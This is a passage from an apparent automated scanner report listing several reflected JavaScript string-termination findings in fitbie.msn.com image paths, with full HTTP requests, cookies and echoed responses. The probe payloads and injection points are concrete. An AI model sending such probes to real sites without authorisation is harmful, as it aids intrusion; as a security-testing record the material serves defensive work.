Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:50 +0000
ETag: "1297607390-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:51 GMT
Date: Sun, 13 Feb 2011 14:29:51 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default28b05';f096ad2ca7c?destination=node%2Fdefault28b05';f096ad2ca7c&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.100. http://fitbie.msn.com/sites/default/files/reveal-toned-abs-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/reveal-toned-abs-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e415e'%3b3c4c5453f52 was submitted in the REST URL parameter 2. This input was echoed as e415e';3c4c5453f52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaulte415e'%3b3c4c5453f52/files/reveal-toned-abs-th.jpg?1296250768 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:42 +0000
ETag: "1297607382-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:43 GMT
Date: Sun, 13 Feb 2011 14:29:43 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulte415e';3c4c5453f52?destination=node%2Fdefaulte415e';3c4c5453f52&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.101. http://fitbie.msn.com/sites/default/files/rw_5k_training_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/rw_5k_training_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c04ef'%3be5ad7847917 was submitted in the REST URL parameter 2. This input was echoed as c04ef';e5ad7847917 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultc04ef'%3be5ad7847917/files/rw_5k_training_th.jpg?1286986707 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:02 +0000
ETag: "1297607402-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:03 GMT
Date: Sun, 13 Feb 2011 14:30:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultc04ef';e5ad7847917?destination=node%2Fdefaultc04ef';e5ad7847917&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.102. http://fitbie.msn.com/sites/default/files/rw_half_marathon_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/rw_half_marathon_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 546c0'%3b5d84375f29e was submitted in the REST URL parameter 2. This input was echoed as 546c0';5d84375f29e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default546c0'%3b5d84375f29e/files/rw_half_marathon_th.jpg?1286986579 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:02 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default546c0';5d84375f29e?destination=node%2Fdefault546c0';5d84375f29e&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.103. http://fitbie.msn.com/sites/default/files/shulah-after-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/shulah-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f49'%3b81ce5708e35 was submitted in the REST URL parameter 2. This input was echoed as b1f49';81ce5708e35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultb1f49'%3b81ce5708e35/files/shulah-after-th.jpg?1294792258 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:42 +0000
ETag: "1297607202-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:42 GMT
Date: Sun, 13 Feb 2011 14:26:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultb1f49';81ce5708e35?destination=node%2Fdefaultb1f49';81ce5708e35&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.104. http://fitbie.msn.com/sites/default/files/sing_arm_dbell_swingB-female-th_1.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/sing_arm_dbell_swingB-female-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b006d'%3b0f74431377f was submitted in the REST URL parameter 2. This input was echoed as b006d';0f74431377f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultb006d'%3b0f74431377f/files/sing_arm_dbell_swingB-female-th_1.jpg?1293055722 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:52 +0000
ETag: "1297607392-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:52 GMT
Date: Sun, 13 Feb 2011 14:29:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultb006d';0f74431377f?destination=node%2Fdefaultb006d';0f74431377f&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.105. http://fitbie.msn.com/sites/default/files/slim-woman-posing-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/slim-woman-posing-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a33'%3b8a58ec615eb was submitted in the REST URL parameter 2. This input was echoed as 93a33';8a58ec615eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default93a33'%3b8a58ec615eb/files/slim-woman-posing-th.jpg?1297192284 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:13 +0000
ETag: "1297607173-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:13 GMT
Date: Sun, 13 Feb 2011 14:26:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default93a33';8a58ec615eb?destination=node%2Fdefault93a33';8a58ec615eb&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.106. http://fitbie.msn.com/sites/default/files/slim_calm_sexy_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/slim_calm_sexy_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a767d'%3b87fcf881513 was submitted in the REST URL parameter 2. This input was echoed as a767d';87fcf881513 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaulta767d'%3b87fcf881513/files/slim_calm_sexy_th.jpg?1286980959 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
